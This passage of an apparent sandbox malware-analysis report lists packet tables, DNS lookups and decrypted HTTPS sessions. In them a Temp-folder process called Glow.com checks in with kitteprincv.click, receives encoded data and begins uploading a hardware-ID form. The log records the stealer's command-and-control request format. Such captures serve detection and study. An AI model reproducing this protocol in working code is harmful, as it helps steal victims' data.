Dec 21, 2024 13:02:21.648087025 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.648129940 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.691333055 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.691819906 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.691895962 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.691915989 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.735326052 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.735709906 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.735783100 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.735819101 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.779359102 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.779658079 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.816478968 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.816498041 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:22.008176088 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:23.885848045 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:23.885938883 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:23.886115074 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:23.886243105 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:23.886276960 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:23.894720078 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:23.894838095 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:23.894956112 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:23.895262957 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:23.895293951 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.108338118 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.113483906 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.115303993 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.115367889 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.115576029 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.116818905 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.116861105 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.116909981 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.896109104 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.896190882 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.896254063 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.896478891 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.896533966 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:25.896563053 CET	49767	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:25.896580935 CET	443	49767	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:26.040137053 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:26.040185928 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:26.040291071 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:26.040730000 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:26.040736914 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.255465031 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.255557060 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.257451057 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.257456064 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.257663965 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.259191990 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.299328089 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825283051 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825320005 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825365067 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825376034 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825448036 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825470924 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825481892 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825486898 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825515985 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825520039 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825556993 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825587034 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825939894 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825948000 CET	443	49773	104.26.3.16	192.168.2.4
Dec 21, 2024 13:02:27.825965881 CET	49773	443	192.168.2.4	104.26.3.16
Dec 21, 2024 13:02:27.825970888 CET	443	49773	104.26.3.16	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 13:01:22.469952106 CET	49984	53	192.168.2.4	1.1.1.1
Dec 21, 2024 13:01:22.711005926 CET	53	49984	1.1.1.1	192.168.2.4
Dec 21, 2024 13:02:05.654742002 CET	50854	53	192.168.2.4	1.1.1.1
Dec 21, 2024 13:02:05.974150896 CET	53	50854	1.1.1.1	192.168.2.4
Dec 21, 2024 13:02:25.898118019 CET	55897	53	192.168.2.4	1.1.1.1
Dec 21, 2024 13:02:26.038285971 CET	53	55897	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 13:01:22.469952106 CET	192.168.2.4	1.1.1.1	0xdc39	Standard query (0)	xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:05.654742002 CET	192.168.2.4	1.1.1.1	0xc1e7	Standard query (0)	kitteprincv.click	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:25.898118019 CET	192.168.2.4	1.1.1.1	0x5f8c	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 13:01:22.711005926 CET	1.1.1.1	192.168.2.4	0xdc39	Name error (3)	xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg	none	none	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:05.974150896 CET	1.1.1.1	192.168.2.4	0xc1e7	No error (0)	kitteprincv.click		104.21.43.127	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:05.974150896 CET	1.1.1.1	192.168.2.4	0xc1e7	No error (0)	kitteprincv.click		172.67.179.135	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:26.038285971 CET	1.1.1.1	192.168.2.4	0x5f8c	No error (0)	rentry.co		104.26.3.16	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:26.038285971 CET	1.1.1.1	192.168.2.4	0x5f8c	No error (0)	rentry.co		172.67.75.40	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:02:26.038285971 CET	1.1.1.1	192.168.2.4	0x5f8c	No error (0)	rentry.co		104.26.2.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

kitteprincv.click

rentry.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:07 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: kitteprincv.click
2024-12-21 12:02:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-21 12:02:08 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=46ooehevl4qcrm2rqab4got3v7; expires=Wed, 16 Apr 2025 05:48:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mFBFYViWYXm0JYcqdDKfWxIS3zkh0u6B40L1%2FDfZN47qWP6%2BmQQtapkjpEF5pMqINo9CncLAA8UpiS0akcNgQB9fx04rz8suAKaTgumaK%2BFn%2FW1jaSBJIFpy7a6dkhaV3T20Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8accbdb0cbc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1632&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1736028&cwnd=175&unsent_bytes=0&cid=331b5e614d1a7821&ts=1051&x=0"
2024-12-21 12:02:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-21 12:02:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: kitteprincv.click
2024-12-21 12:02:09 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl3clear&j=
2024-12-21 12:02:10 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qdduvle2t5fbhlig62tvq53d1a; expires=Wed, 16 Apr 2025 05:48:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAD11BiqmwHkopGWr5lPB3qCfzm5USeZxTA1vPlPMLxhJ%2BTF0w6DevKrU9%2BoebXZDaE59C5Gr4GJbz9swLP2R4zpaQQUVKrLCLEHnnb3%2FYCeQBliuN5U%2BmNIFbD6lavJCk0cZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8bb380b42f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1663&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=951&delivery_rate=1474747&cwnd=231&unsent_bytes=0&cid=72d80b1769b5b937&ts=782&x=0"
2024-12-21 12:02:10 UTC	238	IN	Data Raw: 63 34 62 0d 0a 61 34 6a 43 72 5a 41 65 74 38 6b 6f 66 5a 66 5a 64 6a 31 36 41 35 6d 5a 69 4f 56 45 41 44 35 75 48 4f 44 52 66 74 6f 7a 61 77 30 51 71 72 53 50 71 69 71 62 36 31 73 59 74 65 4d 43 54 77 39 6d 74 62 76 70 67 57 59 36 57 41 39 77 6b 37 52 53 2b 45 55 47 4c 31 48 75 6f 38 48 6a 65 35 76 72 54 51 57 31 34 79 31 47 57 47 62 33 75 37 4c 48 49 57 70 63 44 33 43 43 73 42 57 31 51 77 64 75 41 2b 53 6c 78 66 56 39 30 36 68 45 45 50 4b 38 45 31 77 51 62 66 44 30 34 49 68 6d 4c 42 77 4c 5a 73 4c 72 58 4a 64 57 48 32 77 6d 36 62 48 47 73 6d 4f 62 73 67 6f 59 2b 66 74 4d 48 78 74 6d 2b 2f 58 75 67 53 39 6f 56 67 5a 34 67 37 55 55 71 6c 6f 4e 5a 51 50 71 70 73 54 2f 64 4d 65 6c 54 68 66 35 75 68 6c 63 57 Data Ascii: c4ba4jCrZAet8kofZfZdj16A5mZiOVEAD5uHODRftozaw0QqrSPqiqb61sYteMCTw9mtbvpgWY6WA9wk7RS+EUGL1Huo8Hje5vrTQW14y1GWGb3u7LHIWpcD3CCsBW1QwduA+SlxfV906hEEPK8E1wQbfD04IhmLBwLZsLrXJdWH2wm6bHGsmObsgoY+ftMHxtm+/XugS9oVgZ4g7UUqloNZQPqpsT/dMelThf5uhlcW
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 43 2b 37 2f 50 4c 48 66 69 49 50 50 6e 32 54 6f 67 6d 31 51 51 38 76 46 71 53 35 6a 2f 56 77 6c 66 4d 4b 46 2f 6d 31 45 56 77 58 5a 76 72 37 2b 49 67 6d 59 56 51 45 65 6f 69 38 45 37 64 66 41 32 67 42 34 36 66 41 39 58 54 54 70 45 6c 66 75 2f 73 54 52 31 67 35 75 39 76 36 68 43 56 32 55 52 30 2b 6e 66 30 46 2b 46 59 46 4c 31 47 71 70 73 48 7a 63 64 57 35 51 68 54 2b 76 67 5a 55 45 57 7a 32 2b 2b 65 4e 4b 57 46 63 43 33 53 49 76 42 61 38 58 41 52 70 43 65 72 67 67 62 4a 37 7a 65 73 53 58 39 61 2b 42 46 67 55 64 37 6e 42 71 70 68 6f 65 78 77 4c 63 73 4c 72 58 4c 42 55 43 6d 77 43 35 61 50 48 2b 57 37 56 75 55 77 53 38 4b 6b 53 57 68 5a 72 2b 4f 6e 67 69 53 42 68 56 51 64 33 68 37 51 59 2b 42 39 4a 61 42 47 71 2b 49 2f 54 63 64 36 6e 51 41 6a 31 2b 77 73 52 Data Ascii: C+7/PLHfiIPPn2Togm1QQ8vFqS5j/VwlfMKF/m1EVwXZvr7+IgmYVQEeoi8E7dfA2gB46fA9XTTpElfu/sTR1g5u9v6hCV2UR0+nf0F+FYFL1GqpsHzcdW5QhT+vgZUEWz2++eNKWFcC3SIvBa8XARpCerggbJ7zesSX9a+BFgUd7nBqphoexwLcsLrXLBUCmwC5aPH+W7VuUwS8KkSWhZr+OngiSBhVQd3h7QY+B9JaBGq+I/Tcd6nQAj1+wsR
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 6e 6d 6a 53 42 74 55 51 41 2b 7a 50 4d 62 6f 42 46 52 4c 79 50 70 74 4d 7a 34 50 75 43 6f 52 42 48 79 72 56 52 41 56 6e 69 37 2f 4f 62 48 66 69 4a 52 44 58 61 45 6f 52 4f 31 55 67 64 68 42 75 2b 76 78 2f 4a 38 32 4b 35 4f 46 50 36 34 47 56 73 4b 61 2f 76 7a 37 34 59 73 61 42 78 43 50 6f 57 72 58 4f 41 52 4f 48 67 43 71 4a 58 4d 2f 48 4c 53 76 51 6f 41 75 36 4a 55 57 42 51 68 6f 37 76 6e 6a 79 4e 6e 55 77 31 30 6a 4c 59 57 74 46 6b 48 62 42 76 6c 70 4d 2f 2b 64 4e 2b 6d 52 42 76 39 73 68 39 55 48 6d 48 36 38 61 72 4a 5a 6d 56 45 54 43 62 43 68 78 75 30 58 41 59 74 50 4f 6d 75 77 66 56 71 6c 62 51 45 42 72 57 38 47 42 39 41 49 66 66 79 36 6f 77 73 5a 6c 77 4c 63 34 65 77 47 37 74 63 44 6d 55 48 37 61 54 44 2b 33 48 54 71 30 30 62 38 4b 6b 52 56 68 52 74 75 Data Ascii: nmjSBtUQA+zPMboBFRLyPptMz4PuCoRBHyrVRAVni7/ObHfiJRDXaEoRO1UgdhBu+vx/J82K5OFP64GVsKa/vz74YsaBxCPoWrXOAROHgCqJXM/HLSvQoAu6JUWBQho7vnjyNnUw10jLYWtFkHbBvlpM/+dN+mRBv9sh9UHmH68arJZmVETCbChxu0XAYtPOmuwfVqlbQEBrW8GB9AIffy6owsZlwLc4ewG7tcDmUH7aTD+3HTq00b8KkRVhRtu
2024-12-21 12:02:10 UTC	178	IN	Data Raw: 6d 66 52 49 56 50 6f 57 2f 58 4f 41 52 41 47 59 62 35 4b 37 47 2f 33 72 64 72 45 51 53 2f 72 30 66 57 42 39 6e 39 76 50 6e 67 69 56 6a 57 41 5a 73 67 62 67 57 74 56 74 4a 49 55 6e 74 75 49 2b 71 50 50 4b 6e 59 77 2f 75 71 51 49 66 42 79 2f 69 75 2b 32 4c 5a 6a 6f 63 44 33 47 4c 76 42 53 77 58 67 5a 72 42 2b 79 6d 77 76 64 7a 33 37 6c 43 45 66 69 77 47 31 51 4b 59 66 62 2f 35 6f 4d 75 61 56 5a 4d 4d 4d 4b 30 42 50 67 4a 53 56 6f 45 35 61 44 4d 35 44 7a 4b 35 56 4e 66 38 72 64 55 42 31 68 74 39 66 76 6c 69 79 70 70 56 41 31 0d 0a Data Ascii: mfRIVPoW/XOARAGYb5K7G/3rdrEQS/r0fWB9n9vPngiVjWAZsgbgWtVtJIUntuI+qPPKnYw/uqQIfBy/iu+2LZjocD3GLvBSwXgZrB+ymwvdz37lCEfiwG1QKYfb/5oMuaVZMMMK0BPgJSVoE5aDM5DzK5VNf8rdUB1ht9fvliyppVA1
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 33 63 64 31 0d 0a 79 6a 4c 51 5a 73 56 6b 42 66 51 6a 75 71 4d 37 38 63 39 53 76 54 78 72 78 76 42 42 5a 46 79 47 31 75 2b 32 66 5a 6a 6f 63 49 31 6d 33 38 54 32 43 45 52 59 68 45 4b 71 6e 77 37 49 6b 6c 61 64 4a 45 2f 32 30 45 6c 59 55 61 2f 4c 77 35 6f 77 69 62 6c 55 4a 65 49 4f 32 47 62 6c 56 42 57 55 50 36 61 50 41 2f 58 50 64 36 77 52 66 38 71 4e 55 42 31 68 45 37 50 44 6b 67 57 5a 39 45 68 55 2b 68 62 39 63 34 42 45 46 5a 67 2f 73 70 63 50 7a 65 74 32 75 51 68 76 30 76 52 4a 63 46 32 58 2b 2b 75 57 44 4b 6d 78 57 44 58 2b 4f 75 42 4f 7a 56 45 6b 68 53 65 32 34 6a 36 6f 38 35 4b 68 63 43 4f 57 33 56 45 42 57 65 4c 76 38 35 73 64 2b 49 6c 30 65 64 49 69 39 47 62 64 55 43 6d 41 4f 35 36 62 44 2b 48 58 64 72 55 55 57 35 37 67 59 55 52 39 76 39 2f 58 6e Data Ascii: 3cd1yjLQZsVkBfQjuqM78c9SvTxrxvBBZFyG1u+2fZjocI1m38T2CERYhEKqnw7IkladJE/20ElYUa/Lw5owiblUJeIO2GblVBWUP6aPA/XPd6wRf8qNUB1hE7PDkgWZ9EhU+hb9c4BEFZg/spcPzet2uQhv0vRJcF2X++uWDKmxWDX+OuBOzVEkhSe24j6o85KhcCOW3VEBWeLv85sd+Il0edIi9GbdUCmAO56bD+HXdrUUW57gYUR9v9/Xn
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 73 46 64 5a 43 35 47 37 39 61 41 57 51 47 37 4c 4c 44 2f 47 37 51 75 56 68 66 75 2f 73 54 52 31 67 35 75 38 33 74 6c 7a 5a 68 48 6a 31 6f 67 61 55 58 74 56 31 4a 63 45 66 7a 34 4d 6a 2b 50 49 33 72 54 42 44 38 75 42 74 65 45 57 33 32 2f 75 4f 43 4a 32 52 59 42 6e 53 43 74 52 71 35 56 41 4e 73 43 4f 43 70 79 50 70 37 31 72 6b 4b 55 62 57 38 44 42 39 41 49 64 4c 38 2b 49 6b 32 49 6b 4e 43 5a 38 4b 30 45 50 67 4a 53 57 73 44 35 61 54 49 2f 6e 72 51 72 55 63 65 2b 72 6f 55 55 42 78 71 38 76 33 72 69 69 4e 76 57 42 35 30 69 62 77 51 73 56 30 45 4c 30 65 71 70 39 65 79 4a 4a 57 61 52 78 48 37 76 41 49 66 42 79 2f 69 75 2b 32 4c 5a 6a 6f 63 44 58 4b 4e 73 42 4f 37 55 67 68 6c 47 2f 69 73 78 76 70 35 32 61 42 45 47 65 65 39 47 31 59 62 59 76 4c 38 34 6f 73 73 59 Data Ascii: sFdZC5G79aAWQG7LLD/G7QuVhfu/sTR1g5u83tlzZhHj1ogaUXtV1JcEfz4Mj+PI3rTBD8uBteEW32/uOCJ2RYBnSCtRq5VANsCOCpyPp71rkKUbW8DB9AIdL8+Ik2IkNCZ8K0EPgJSWsD5aTI/nrQrUce+roUUBxq8v3riiNvWB50ibwQsV0EL0eqp9eyJJWaRxH7vAIfBy/iu+2LZjocDXKNsBO7UghlG/isxvp52aBEGee9G1YbYvL84ossY
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 43 36 77 71 6f 52 67 35 77 52 2f 50 67 79 50 34 38 6a 65 74 4d 46 76 4f 38 45 6c 45 4b 5a 50 33 30 35 59 34 76 5a 6c 51 50 66 6f 61 33 47 37 31 53 42 57 51 4f 36 61 2f 4c 2b 33 4c 63 70 41 70 52 74 62 77 4d 48 30 41 68 32 75 44 70 69 79 73 69 51 30 4a 6e 77 72 51 51 2b 41 6c 4a 59 77 66 76 6f 4d 58 30 65 4e 43 74 51 42 72 31 73 42 64 51 48 47 66 2f 39 4f 71 4d 4c 32 4e 61 43 58 53 4a 74 52 47 37 56 77 38 76 52 36 71 6e 31 37 49 6b 6c 59 74 52 45 76 6d 38 56 45 42 57 65 4c 76 38 35 73 64 2b 49 6c 63 41 65 6f 57 7a 45 62 74 5a 44 47 73 44 37 36 44 48 34 48 54 56 72 46 67 4e 39 62 49 52 55 78 74 68 2f 2f 33 6a 67 53 56 6d 48 45 49 2b 68 61 74 63 34 42 45 6b 59 77 37 44 70 39 53 79 59 35 75 79 43 68 6a 35 2b 30 77 66 47 57 72 78 39 4f 65 45 49 47 46 58 43 58 Data Ascii: C6wqoRg5wR/PgyP48jetMFvO8ElEKZP305Y4vZlQPfoa3G71SBWQO6a/L+3LcpApRtbwMH0Ah2uDpiysiQ0JnwrQQ+AlJYwfvoMX0eNCtQBr1sBdQHGf/9OqML2NaCXSJtRG7Vw8vR6qn17IklYtREvm8VEBWeLv85sd+IlcAeoWzEbtZDGsD76DH4HTVrFgN9bIRUxth//3jgSVmHEI+hatc4BEkYw7Dp9SyY5uyChj5+0wfGWrx9OeEIGFXCX
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 2b 45 64 4a 4e 31 75 6b 34 4e 32 79 4a 4a 58 73 53 51 33 6e 76 52 64 4a 47 79 62 46 78 63 32 52 4c 47 56 4d 43 32 6d 4e 38 31 4c 34 58 6b 6b 33 4d 4b 71 70 79 4f 6c 74 77 36 5a 61 47 4c 57 45 57 68 38 41 49 61 4f 37 33 34 51 6f 62 46 73 61 62 38 2b 55 43 72 4a 57 47 57 67 65 35 65 43 42 73 6e 71 56 38 78 6c 52 74 62 38 46 48 30 41 78 71 61 43 2f 31 48 45 79 44 68 4d 77 6d 2f 4d 4b 2b 41 6c 62 49 55 6e 34 34 4a 65 79 4f 39 61 35 57 42 6e 32 72 52 63 59 4a 6c 2f 63 34 65 65 42 4d 58 4e 69 4d 6e 6d 59 76 68 71 76 51 45 56 36 43 75 53 75 79 4f 51 38 6d 2b 74 46 58 36 32 43 56 42 64 59 58 72 57 37 38 73 64 2b 49 6d 6b 50 63 49 79 30 43 71 6b 63 4c 6e 55 45 37 4c 66 65 73 6a 4b 56 72 51 70 48 70 66 56 55 57 77 6b 68 6f 36 75 34 33 48 4d 78 43 31 77 73 6e 66 30 Data Ascii: +EdJN1uk4N2yJJXsSQ3nvRdJGybFxc2RLGVMC2mN81L4Xkk3MKqpyOltw6ZaGLWEWh8AIaO734QobFsab8+UCrJWGWge5eCBsnqV8xlRtb8FH0AxqaC/1HEyDhMwm/MK+AlbIUn44JeyO9a5WBn2rRcYJl/c4eeBMXNiMnmYvhqvQEV6CuSuyOQ8m+tFX62CVBdYXrW78sd+ImkPcIy0CqkcLnUE7LfesjKVrQpHpfVUWwkho6u43HMxC1wsnf0
2024-12-21 12:02:10 UTC	1369	IN	Data Raw: 6d 45 48 37 62 62 65 73 6a 4b 56 70 41 70 48 7a 50 74 63 48 79 63 76 75 2b 4f 71 33 32 5a 58 58 77 4a 77 68 61 55 4e 39 58 59 48 61 41 6a 38 73 4e 6a 39 50 4a 76 72 54 46 2b 74 36 56 6f 66 48 48 43 37 6f 37 72 56 66 54 63 50 57 79 37 51 72 46 4b 68 45 52 38 76 55 62 6a 75 6a 2b 41 38 6a 65 73 4e 48 4f 65 70 45 6c 77 4f 59 72 7a 46 31 4b 41 6f 5a 56 30 61 62 70 57 38 55 35 5a 6e 4b 46 45 33 2f 36 50 42 2f 48 76 44 75 67 70 52 74 62 52 55 42 79 45 68 73 37 76 56 79 57 5a 36 48 46 51 2b 74 37 41 53 74 6c 59 66 66 6b 54 4e 72 73 6a 7a 61 73 57 38 52 56 44 62 6a 54 55 66 56 69 48 39 75 37 4c 56 61 43 4a 59 48 54 37 61 34 30 37 6a 42 46 6f 34 57 62 69 2f 67 65 73 38 77 2b 73 53 54 62 76 37 42 68 39 41 49 62 7a 34 2b 4a 55 67 59 55 6f 50 4f 62 79 4e 4f 37 5a 57 Data Ascii: mEH7bbesjKVpApHzPtcHycvu+Oq32ZXXwJwhaUN9XYHaAj8sNj9PJvrTF+t6VofHHC7o7rVfTcPWy7QrFKhER8vUbjuj+A8jesNHOepElwOYrzF1KAoZV0abpW8U5ZnKFE3/6PB/HvDugpRtbRUByEhs7vVyWZ6HFQ+t7AStlYffkTNrsjzasW8RVDbjTUfViH9u7LVaCJYHT7a407jBFo4Wbi/ges8w+sSTbv7Bh9AIbz4+JUgYUoPObyNO7ZW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:11 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OCX7VZAWZQ7KITFAT1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18166 Host: kitteprincv.click
2024-12-21 12:02:11 UTC	15331	OUT	Data Raw: 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c Data Ascii: --OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; 